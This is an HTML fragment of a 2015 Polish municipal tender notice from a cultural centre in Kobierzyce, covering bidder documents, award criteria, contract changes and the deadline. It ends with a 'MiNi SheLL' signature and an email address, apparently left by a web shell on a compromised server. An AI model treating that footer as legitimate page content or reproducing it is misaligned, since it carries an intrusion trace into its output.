<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 77</li>
<li>2 - Jakość usługi oceniana na podstawie wieku pojazdów którymi będzie świadczona usługa - 23</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany wykazu osób na osoby o tożsamych kwalifikacjach do kwalifikacji osób wskazanych w ofercie do przetargu nieograniczonego. Zmiana wykazu osób - kierowców dla swej ważności wymaga formy pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kultura-kobierzyce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminne Centrum Kultury i Sportu ul. Ludowa 7, 55-040 Kobierzyce, 
powiat wrocławski, województwo dolnośląskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.01.2015 godzina 09:00, miejsce: Gminne Centrum Kultury i Sportu ul. Ludowa 7, 55-040 Kobierzyce, 
powiat wrocławski, województwo dolnośląskie 
Sala Galeria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com